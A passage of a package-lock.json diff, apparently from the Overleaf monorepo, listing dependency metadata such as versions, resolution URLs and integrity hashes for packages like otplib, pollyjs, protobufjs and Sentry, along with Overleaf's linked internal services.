"dependencies": { + "@opentelemetry/core": "^1.1.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.1.0" + } + }, + "node_modules/@otplib/core": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz", + "integrity": "sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==" + }, + "node_modules/@otplib/plugin-crypto": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/plugin-crypto/-/plugin-crypto-12.0.1.tgz", + "integrity": "sha512-qPuhN3QrT7ZZLcLCyKOSNhuijUi9G5guMRVrxq63r9YNOxxQjPm59gVxLM+7xGnHnM6cimY57tuKsjK7y9LM1g==", + "dependencies": { + "@otplib/core": "^12.0.1" + } + }, + "node_modules/@otplib/plugin-thirty-two": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz", + "integrity": "sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==", + "dependencies": { + "@otplib/core": "^12.0.1", + "thirty-two": "^1.0.2" + } + }, + "node_modules/@otplib/preset-default": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz", + "integrity": "sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/plugin-crypto": "^12.0.1", + "@otplib/plugin-thirty-two": "^12.0.1" + } + }, + "node_modules/@otplib/preset-v11": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz", + "integrity": "sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==", + "dependencies": { + "@otplib/core": "^12.0.1", + "@otplib/plugin-crypto": "^12.0.1", + "@otplib/plugin-thirty-two": "^12.0.1" + } + }, + "node_modules/@overleaf/access-token-encryptor": { + "resolved": "libraries/access-token-encryptor", + "link": true + }, + "node_modules/@overleaf/analytics": { + "resolved": "services/analytics", + "link": true + }, + "node_modules/@overleaf/chat": { + "resolved": "services/chat", + "link": true + }, + "node_modules/@overleaf/clsi": { + "resolved": "services/clsi", + "link": true + }, + "node_modules/@overleaf/clsi-cache": { + "resolved": "services/clsi-cache", + "link": true + }, + "node_modules/@overleaf/clsi-perf": { + "resolved": "services/clsi-perf", + "link": true + }, + "node_modules/@overleaf/codemirror-tree-view": { + "version": "0.1.3", + "resolved": "https://registry.npmjs.org/@overleaf/codemirror-tree-view/-/codemirror-tree-view-0.1.3.tgz", + "integrity": "sha512-/ysOnX+ovObqj0uR78tumQtK/y0qFwbawcCGxT9JDeyJPgfPrK3PYTIvoZ1SgmSxaXpOPkds7aL+4Hv6VWZqSw==", + "dev": true, + "peerDependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0" + } + }, + "node_modules/@overleaf/contacts": { + "resolved": "services/contacts", + "link": true + }, + "node_modules/@overleaf/docstore": { + "resolved": "services/docstore", + "link": true + }, + "node_modules/@overleaf/document-updater": { + "resolved": "services/document-updater", + "link": true + }, + "node_modules/@overleaf/eslint-plugin": { + "resolved": "libraries/eslint-plugin", + "link": true + }, + "node_modules/@overleaf/fetch-utils": { + "resolved": "libraries/fetch-utils", + "link": true + }, + "node_modules/@overleaf/filestore": { + "resolved": "services/filestore", + "link": true + }, + 
"node_modules/@overleaf/github-sync": { + "resolved": "services/github-sync", + "link": true + }, + "node_modules/@overleaf/idp": { + "resolved": "services/idp", + "link": true + }, + "node_modules/@overleaf/logger": { + "resolved": "libraries/logger", + "link": true + }, + "node_modules/@overleaf/metrics": { + "resolved": "libraries/metrics", + "link": true + }, + "node_modules/@overleaf/mongo-utils": { + "resolved": "libraries/mongo-utils", + "link": true + }, + "node_modules/@overleaf/notifications": { + "resolved": "services/notifications", + "link": true + }, + "node_modules/@overleaf/o-error": { + "resolved": "libraries/o-error", + "link": true + }, + "node_modules/@overleaf/object-persistor": { + "resolved": "libraries/object-persistor", + "link": true + }, + "node_modules/@overleaf/piece-table": { + "resolved": "libraries/piece-table", + "link": true + }, + "node_modules/@overleaf/project-history": { + "resolved": "services/project-history", + "link": true + }, + "node_modules/@overleaf/promise-utils": { + "resolved": "libraries/promise-utils", + "link": true + }, + "node_modules/@overleaf/ranges-tracker": { + "resolved": "libraries/ranges-tracker", + "link": true + }, + "node_modules/@overleaf/real-time": { + "resolved": "services/real-time", + "link": true + }, + "node_modules/@overleaf/redis-wrapper": { + "resolved": "libraries/redis-wrapper", + "link": true + }, + "node_modules/@overleaf/references": { + "resolved": "services/references", + "link": true + }, + "node_modules/@overleaf/saas-e2e": { + "resolved": "tools/saas-e2e", + "link": true + }, + "node_modules/@overleaf/settings": { + "resolved": "libraries/settings", + "link": true + }, + "node_modules/@overleaf/stream-utils": { + "resolved": "libraries/stream-utils", + "link": true + }, + "node_modules/@overleaf/templates": { + "resolved": "services/templates", + "link": true + }, + "node_modules/@overleaf/third-party-datastore": { + "resolved": "services/third-party-datastore", + "link": true + }, + "node_modules/@overleaf/thirdparty-references": { + "resolved": "services/third-party-references", + "link": true + }, + "node_modules/@overleaf/tpdsworker": { + "resolved": "services/tpdsworker", + "link": true + }, + "node_modules/@overleaf/web": { + "resolved": "services/web", + "link": true + }, + "node_modules/@phosphor-icons/react": { + "version": "2.1.7", + "resolved": "https://registry.npmjs.org/@phosphor-icons/react/-/react-2.1.7.tgz", + "integrity": "sha512-g2e2eVAn1XG2a+LI09QU3IORLhnFNAFkNbo2iwbX6NOKSLOwvEMmTa7CgOzEbgNWR47z8i8kwjdvYZ5fkGx1mQ==", + "license": "MIT", + "engines": { + "node": ">=10" + }, + "peerDependencies": { + "react": ">= 16.8", + "react-dom": ">= 16.8" + } + }, + "node_modules/@pkgjs/parseargs": { + "version": "0.11.0", + "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", + "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", + "dev": true, + "optional": true, + "engines": { + "node": ">=14" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin": { + "version": "0.5.16", + "resolved": "https://registry.npmjs.org/@pmmmwh/react-refresh-webpack-plugin/-/react-refresh-webpack-plugin-0.5.16.tgz", + "integrity": "sha512-kLQc9xz6QIqd2oIYyXRUiAp79kGpFBm3fEM9ahfG1HI0WI5gdZ2OVHWdmZYnwODt7ISck+QuQ6sBPrtvUBML7Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-html": "^0.0.9", + "core-js-pure": "^3.23.3", + "error-stack-parser": "^2.0.6", + "html-entities": "^2.1.0", + "loader-utils": "^2.0.4", + 
"schema-utils": "^4.2.0", + "source-map": "^0.7.3" + }, + "engines": { + "node": ">= 10.13" + }, + "peerDependencies": { + "@types/webpack": "4.x || 5.x", + "react-refresh": ">=0.10.0 <1.0.0", + "sockjs-client": "^1.4.0", + "type-fest": ">=0.17.0 <5.0.0", + "webpack": ">=4.43.0 <6.0.0", + "webpack-dev-server": "3.x || 4.x || 5.x", + "webpack-hot-middleware": "2.x", + "webpack-plugin-serve": "0.x || 1.x" + }, + "peerDependenciesMeta": { + "@types/webpack": { + "optional": true + }, + "sockjs-client": { + "optional": true + }, + "type-fest": { + "optional": true + }, + "webpack-dev-server": { + "optional": true + }, + "webpack-hot-middleware": { + "optional": true + }, + "webpack-plugin-serve": { + "optional": true + } + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true, + "license": "MIT" + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/@pmmmwh/react-refresh-webpack-plugin/node_modules/source-map": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.7.4.tgz", + "integrity": "sha512-l3BikUxvPOcn5E74dZiq5BGsTb5yEwhaTSzccU6t4sDOH8NWJCstKO5QT2CvtFoK6F0saL7p9xHAqHOlCPJygA==", + "dev": true, + "license": "BSD-3-Clause", + "engines": { + "node": ">= 8" + } + }, + "node_modules/@pollyjs/adapter": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/adapter/-/adapter-6.0.6.tgz", + "integrity": "sha512-szhys0NiFQqCJDMC0kpDyjhLqSI7aWc6m6iATCRKgcMcN/7QN85pb3GmRzvnNV8+/Bi2AUSCwxZljcsKhbYVWQ==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6" + } + }, + "node_modules/@pollyjs/adapter-node-http": { + "version": "6.0.6", + "resolved": 
"https://registry.npmjs.org/@pollyjs/adapter-node-http/-/adapter-node-http-6.0.6.tgz", + "integrity": "sha512-jdJG7oncmSHZAtVMmRgOxh5A56b7G8H9ULlk/ZaVJ+jNrlFXhLmPpx8OQoSF4Cuq2ugdiWmwmAjFXHStcpY3Mw==", + "dev": true, + "dependencies": { + "@pollyjs/adapter": "^6.0.6", + "@pollyjs/utils": "^6.0.6", + "lodash-es": "^4.17.21", + "nock": "^13.2.1" + } + }, + "node_modules/@pollyjs/core": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/core/-/core-6.0.6.tgz", + "integrity": "sha512-1ZZcmojW8iSFmvHGeLlvuudM3WiDV842FsVvtPAo3HoAYE6jCNveLHJ+X4qvonL4enj1SyTF3hXA107UkQFQrA==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6", + "@sindresorhus/fnv1a": "^2.0.1", + "blueimp-md5": "^2.19.0", + "fast-json-stable-stringify": "^2.1.0", + "is-absolute-url": "^3.0.3", + "lodash-es": "^4.17.21", + "loglevel": "^1.8.0", + "route-recognizer": "^0.3.4", + "slugify": "^1.6.3" + } + }, + "node_modules/@pollyjs/node-server": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/node-server/-/node-server-6.0.6.tgz", + "integrity": "sha512-nkP1+hdNoVOlrRz9R84haXVsaSmo8Xmq7uYK9GeUMSLQy4Fs55ZZ9o2KI6vRA8F6ZqJSbC31xxwwIoTkjyP7Vg==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6", + "body-parser": "^1.19.0", + "cors": "^2.8.5", + "express": "^4.17.1", + "fs-extra": "^10.0.0", + "http-graceful-shutdown": "^3.1.5", + "morgan": "^1.10.0", + "nocache": "^3.0.1" + } + }, + "node_modules/@pollyjs/node-server/node_modules/nocache": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/nocache/-/nocache-3.0.4.tgz", + "integrity": "sha512-WDD0bdg9mbq6F4mRxEYcPWwfA1vxd0mrvKOyxI7Xj/atfRHVeutzuWByG//jfm4uPzp0y4Kj051EORCBSQMycw==", + "dev": true, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/@pollyjs/persister": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/persister/-/persister-6.0.6.tgz", + "integrity": "sha512-9KB1p+frvYvFGur4ifzLnFKFLXAMXrhAhCnVhTnkG2WIqqQPT7y+mKBV/DKCmYFx8GPA9FiNGqt2pB53uJpIdw==", + "dev": true, + "dependencies": { + "@pollyjs/utils": "^6.0.6", + "@types/set-cookie-parser": "^2.4.1", + "bowser": "^2.4.0", + "fast-json-stable-stringify": "^2.1.0", + "lodash-es": "^4.17.21", + "set-cookie-parser": "^2.4.8", + "utf8-byte-length": "^1.0.4" + } + }, + "node_modules/@pollyjs/persister-fs": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/persister-fs/-/persister-fs-6.0.6.tgz", + "integrity": "sha512-/ALVgZiH2zGqwLkW0Mntc0Oq1v7tR8LS8JD2SAyIsHpnSXeBUnfPWwjAuYw0vqORHFVEbwned6MBRFfvU/3qng==", + "dev": true, + "dependencies": { + "@pollyjs/node-server": "^6.0.6", + "@pollyjs/persister": "^6.0.6" + } + }, + "node_modules/@pollyjs/utils": { + "version": "6.0.6", + "resolved": "https://registry.npmjs.org/@pollyjs/utils/-/utils-6.0.6.tgz", + "integrity": "sha512-nhVJoI3nRgRimE0V2DVSvsXXNROUH6iyJbroDu4IdsOIOFC1Ds0w+ANMB4NMwFaqE+AisWOmXFzwAGdAfyiQVg==", + "dev": true, + "dependencies": { + "qs": "^6.10.1", + "url-parse": "^1.5.3" + } + }, + "node_modules/@popperjs/core": { + "version": "2.11.8", + "resolved": "https://registry.npmjs.org/@popperjs/core/-/core-2.11.8.tgz", + "integrity": "sha512-P1st0aksCrn9sGZhp8GMYwBnQsbvAWsZAX44oXNNvLHGqAOcoVxmjZiohstwQ7SqKnbR47akdNi+uleWD8+g6A==", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/popperjs" + } + }, + "node_modules/@protobufjs/aspromise": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz", + "integrity": 
"sha1-m4sMxmPWaafY9vXQiToU00jzD78=" + }, + "node_modules/@protobufjs/base64": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz", + "integrity": "sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==" + }, + "node_modules/@protobufjs/codegen": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.4.tgz", + "integrity": "sha512-YyFaikqM5sH0ziFZCN3xDC7zeGaB/d0IUb9CATugHWbd1FRFwWwt4ld4OYMPWu5a3Xe01mGAULCdqhMlPl29Jg==" + }, + "node_modules/@protobufjs/eventemitter": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz", + "integrity": "sha1-NVy8mLr61ZePntCV85diHx0Ga3A=" + }, + "node_modules/@protobufjs/fetch": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz", + "integrity": "sha1-upn7WYYUr2VwDBYZ/wbUVLDYTEU=", + "dependencies": { + "@protobufjs/aspromise": "^1.1.1", + "@protobufjs/inquire": "^1.1.0" + } + }, + "node_modules/@protobufjs/float": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz", + "integrity": "sha1-Xp4avctz/Ap8uLKR33jIy9l7h9E=" + }, + "node_modules/@protobufjs/inquire": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.0.tgz", + "integrity": "sha1-/yAOPnzyQp4tyvwRQIKOjMY48Ik=" + }, + "node_modules/@protobufjs/path": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz", + "integrity": "sha1-bMKyDFya1q0NzP0hynZz2Nf79o0=" + }, + "node_modules/@protobufjs/pool": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz", + "integrity": "sha1-Cf0V8tbTq/qbZbw2ZQbWrXhG/1Q=" + }, + "node_modules/@protobufjs/utf8": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.0.tgz", + "integrity": "sha1-p3c2C1s5oaLlEG+OhY8v0tBgxXA=" + }, + "node_modules/@react-aria/ssr": { + "version": "3.9.4", + "resolved": "https://registry.npmjs.org/@react-aria/ssr/-/ssr-3.9.4.tgz", + "integrity": "sha512-4jmAigVq409qcJvQyuorsmBR4+9r3+JEC60wC+Y0MZV0HCtTmm8D9guYXlJMdx0SSkgj0hHAyFm/HvPNFofCoQ==", + "dev": true, + "dependencies": { + "@swc/helpers": "^0.5.0" + }, + "engines": { + "node": ">= 12" + }, + "peerDependencies": { + "react": "^16.8.0 || ^17.0.0-rc.1 || ^18.0.0" + } + }, + "node_modules/@react-dnd/asap": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/@react-dnd/asap/-/asap-5.0.2.tgz", + "integrity": "sha512-WLyfoHvxhs0V9U+GTsGilGgf2QsPl6ZZ44fnv0/b8T3nQyvzxidxsg/ZltbWssbsRDlYW8UKSQMTGotuTotZ6A==", + "dev": true + }, + "node_modules/@react-dnd/invariant": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@react-dnd/invariant/-/invariant-4.0.2.tgz", + "integrity": "sha512-xKCTqAK/FFauOM9Ta2pswIyT3D8AQlfrYdOi/toTPEhqCuAs1v5tcJ3Y08Izh1cJ5Jchwy9SeAXmMg6zrKs2iw==", + "dev": true + }, + "node_modules/@react-dnd/shallowequal": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/@react-dnd/shallowequal/-/shallowequal-4.0.2.tgz", + "integrity": "sha512-/RVXdLvJxLg4QKvMoM5WlwNR9ViO9z8B/qPcc+C0Sa/teJY7QG7kJ441DwzOjMYEY7GmU4dj5EcGHIkKZiQZCA==", + "dev": true + }, + "node_modules/@remix-run/router": { + "version": "1.19.1", + "resolved": "https://registry.npmjs.org/@remix-run/router/-/router-1.19.1.tgz", + "integrity": 
"sha512-S45oynt/WH19bHbIXjtli6QmwNYvaz+vtnubvNpNDvUOoA/OWh6j1OikIP3G+v5GHdxyC6EXoChG3HgYGEUfcg==", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@replit/codemirror-emacs": { + "version": "6.0.0", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-emacs.git#4394c03858f27053f8768258e9493866e06e938e", + "integrity": "sha512-5rEKNeFfYPi3ytelXa5IIXnRu5Wvpzz80W1xa9k7gorC2wHlFRveIiIeXdwcQQw92pe5cT5vtpldLLZW5xcAIg==", + "dev": true, + "peerDependencies": { + "@codemirror/autocomplete": "^6.0.2", + "@codemirror/commands": "^6.0.0", + "@codemirror/search": "^6.0.0", + "@codemirror/state": "^6.0.1", + "@codemirror/view": "^6.3.0" + } + }, + "node_modules/@replit/codemirror-indentation-markers": { + "version": "6.5.3", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-indentation-markers.git#78264032eb286bc47871569ae87bff5ca1c6c161", + "integrity": "sha512-M64D1BO2iLWI0ByW4oiiRj104pulG+07FZOz+NfkJMY2zmrbsidKii/8Ibwmp7kEuWY1n7STtTtWxqZZB/HsjA==", + "dev": true, + "peerDependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0" + } + }, + "node_modules/@replit/codemirror-vim": { + "version": "6.2.1", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-vim.git#1bef138382d948018f3f9b8a4d7a70ab61774e4b", + "integrity": "sha512-ATm1ZFJptmNcNlGKMFsCFQv41PYKBlDwC5pPKpceSEwws0yX2pS1FrV/cMikT9Ylw15s3grYUibYX3ObHZq8sQ==", + "dev": true, + "peerDependencies": { + "@codemirror/commands": "^6.0.0", + "@codemirror/language": "^6.1.0", + "@codemirror/search": "^6.2.0", + "@codemirror/state": "^6.0.1", + "@codemirror/view": "^6.0.3" + } + }, + "node_modules/@restart/hooks": { + "version": "0.4.16", + "resolved": "https://registry.npmjs.org/@restart/hooks/-/hooks-0.4.16.tgz", + "integrity": "sha512-f7aCv7c+nU/3mF7NWLtVVr0Ra80RqsO89hO72r+Y/nvQr5+q0UFGkocElTH6MJApvReVh6JHUFYn2cw1WdHF3w==", + "dev": true, + "dependencies": { + "dequal": "^2.0.3" + }, + "peerDependencies": { + "react": ">=16.8.0" + } + }, + "node_modules/@restart/ui": { + "version": "1.6.9", + "resolved": "https://registry.npmjs.org/@restart/ui/-/ui-1.6.9.tgz", + "integrity": "sha512-mUbygUsJcRurjZCt1f77gg4DpheD1D+Sc7J3JjAkysUj7t8m4EBJVOqWC9788Qtbc69cJ+HlJc6jBguKwS8Mcw==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.21.0", + "@popperjs/core": "^2.11.6", + "@react-aria/ssr": "^3.5.0", + "@restart/hooks": "^0.4.9", + "@types/warning": "^3.0.0", + "dequal": "^2.0.3", + "dom-helpers": "^5.2.0", + "uncontrollable": "^8.0.1", + "warning": "^4.0.3" + }, + "peerDependencies": { + "react": ">=16.14.0", + "react-dom": ">=16.14.0" + } + }, + "node_modules/@restart/ui/node_modules/dom-helpers": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz", + "integrity": "sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.8.7", + "csstype": "^3.0.2" + } + }, + "node_modules/@restart/ui/node_modules/uncontrollable": { + "version": "8.0.4", + "resolved": "https://registry.npmjs.org/uncontrollable/-/uncontrollable-8.0.4.tgz", + "integrity": "sha512-ulRWYWHvscPFc0QQXvyJjY6LIXU56f0h8pQFvhxiKk5V1fcI8gp9Ht9leVAhrVjzqMw0BgjspBINx9r6oyJUvQ==", + "dev": true, + "peerDependencies": { + "react": ">=16.14.0" + } + }, + "node_modules/@restart/ui/node_modules/warning": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/warning/-/warning-4.0.3.tgz", + "integrity": 
"sha512-rpJyN222KWIvHJ/F53XSZv0Zl/accqHR8et1kpaMTD/fLCRxtV8iX8czMzY7sVZupTI3zcUTg8eycS2kNF9l6w==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "node_modules/@sentry-internal/tracing": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry-internal/tracing/-/tracing-7.46.0.tgz", + "integrity": "sha512-KYoppa7PPL8Er7bdPoxTNUfIY804JL7hhOEomQHYD22rLynwQ4AaLm3YEY75QWwcGb0B7ZDMV+tSumW7Rxuwuw==", + "dev": true, + "dependencies": { + "@sentry/core": "7.46.0", + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/@sentry/core": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/core/-/core-7.46.0.tgz", + "integrity": "sha512-BnNHGh/ZTztqQedFko7vb2u6yLs/kWesOQNivav32ZbsEpVCjcmG1gOJXh2YmGIvj3jXOC9a4xfIuh+lYFcA6A==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/@sentry/types": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/types/-/types-7.46.0.tgz", + "integrity": "sha512-2FMEMgt2h6u7AoELhNhu9L54GAh67KKfK2pJ1kEXJHmWxM9FSCkizjLs/t+49xtY7jEXr8qYq8bV967VfDPQ9g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/@sentry/utils": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/utils/-/utils-7.46.0.tgz", + "integrity": "sha512-elRezDAF84guMG0OVIIZEWm6wUpgbda4HGks98CFnPsrnMm3N1bdBI9XdlxYLtf+ir5KsGR5YlEIf/a0kRUwAQ==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry-internal/tracing/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/@sentry/replay": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/replay/-/replay-7.46.0.tgz", + "integrity": "sha512-rHsAFdeEu47JRy6mEwwN+M+zTTWlOFWw9sR/eDCvik2lxAXBN2mXvf/N/MN9zQB3+QnS13ke+SvwVW7CshLOXg==", + "dev": true, + "dependencies": { + "@sentry/core": "7.46.0", + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@sentry/replay/node_modules/@sentry/core": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/core/-/core-7.46.0.tgz", + "integrity": "sha512-BnNHGh/ZTztqQedFko7vb2u6yLs/kWesOQNivav32ZbsEpVCjcmG1gOJXh2YmGIvj3jXOC9a4xfIuh+lYFcA6A==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "@sentry/utils": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry/replay/node_modules/@sentry/types": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/types/-/types-7.46.0.tgz", + "integrity": "sha512-2FMEMgt2h6u7AoELhNhu9L54GAh67KKfK2pJ1kEXJHmWxM9FSCkizjLs/t+49xtY7jEXr8qYq8bV967VfDPQ9g==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry/replay/node_modules/@sentry/utils": { + "version": "7.46.0", + "resolved": "https://registry.npmjs.org/@sentry/utils/-/utils-7.46.0.tgz", + "integrity": 
"sha512-elRezDAF84guMG0OVIIZEWm6wUpgbda4HGks98CFnPsrnMm3N1bdBI9XdlxYLtf+ir5KsGR5YlEIf/a0kRUwAQ==", + "dev": true, + "dependencies": { + "@sentry/types": "7.46.0", + "tslib": "^1.9.3" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@sentry/replay/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/@sideway/address": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/@sideway/address/-/address-4.1.4.tgz", + "integrity": "sha512-7vwq+rOHVWjyXxVlR76Agnvhy8I9rpzjosTESvmhNeXOXdZZB15Fl+TI9x1SiHZH5Jv2wTGduSxFDIaq0m3DUw==", + "dependencies": { + "@hapi/hoek": "^9.0.0" + } + }, + "node_modules/@sideway/formula": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@sideway/formula/-/formula-3.0.1.tgz", + "integrity": "sha512-/poHZJJVjx3L+zVD6g9KgHfYnb443oi7wLu/XKojDviHy6HOEOA6z1Trk5aR1dGcmPenJEgb2sK2I80LeS3MIg==" + }, + "node_modules/@sideway/pinpoint": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/@sideway/pinpoint/-/pinpoint-2.0.0.tgz", + "integrity": 